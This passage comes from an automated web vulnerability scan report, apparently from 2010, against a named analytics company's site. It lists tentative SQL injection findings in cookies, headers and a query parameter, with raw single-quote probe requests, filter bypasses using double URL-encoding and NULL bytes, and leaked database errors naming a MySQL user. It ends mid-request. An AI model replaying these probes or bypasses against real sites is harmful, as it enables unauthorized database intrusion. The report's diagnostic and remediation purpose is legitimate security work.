Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 06 Nov 2010 01:59:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 01:59:14 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 01:59:14 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21528


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.130. http://www.analyticspros.com/blog/seo.feed [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.feed

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.feed?type=atom
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:50 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.feed HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.feed?type=atom
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:26:51 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:26:55 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:26:55 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21579


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.131. http://www.analyticspros.com/blog/seo.feed [fpssCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.feed

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.feed?type=rss HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:22:58 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:22:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:22:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21580


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.132. http://www.analyticspros.com/blog/seo.feed [type parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.feed

Issue detail

The type parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the type parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the type request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo.feed?type=rss%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:20:35 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.feed?type=rss%2527%2527 HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:20:36 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:20:39 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:20:39 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21594


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.133. http://www.analyticspros.com/blog/seo.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /blog/seo.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:52 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo.html HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)%2527%2527
Connection: close
Referer: http://www.analyticspros.com/consulting.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 06:44:53 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.134. http://www.analyticspros.com/blog/seo/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:55 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:25:56 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:25:59 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:25:59 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.135. http://www.analyticspros.com/blog/seo/ [apros2.0_tpl cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/

Issue detail

The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0'; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:14:59 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0''; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 04:15:00 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Connection: close
Content-Type: text/html
Content-Length: 326

<br />
<b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro
...[SNIP]...

1.136. http://www.analyticspros.com/blog/seo/ [fpssCookie cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/

Issue detail

The fpssCookie cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fpssCookie cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true'; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:08 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/ HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true''; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 2

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:12:09 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 07:12:11 GMT; path=/
Last-Modified: Sat, 06 Nov 2010 07:12:11 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb">

<
...[SNIP]...

1.137. http://www.analyticspros.com/blog/seo/59-search-ranking-position-with-ga.html [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.analyticspros.com
Path:   /blog/seo/59-search-ranking-position-with-ga.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /blog/seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)'
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;

Response 1

HTTP/1.1 200 OK
Date: Sat, 06 Nov 2010 07:30:18 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.14
Connection: close
Content-Type: text/html
Content-Length: 76

Database Error: Unable to connect to the database:Could not connect to MySQL

Request 2

GET /blog/seo/59-search-ranking-position-with-ga.html?itemid=70#comment HTTP/1.1
Host: www.analyticspros.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)''
Connection: close
Referer: http://www.analyticspros.com/blog/seo.html
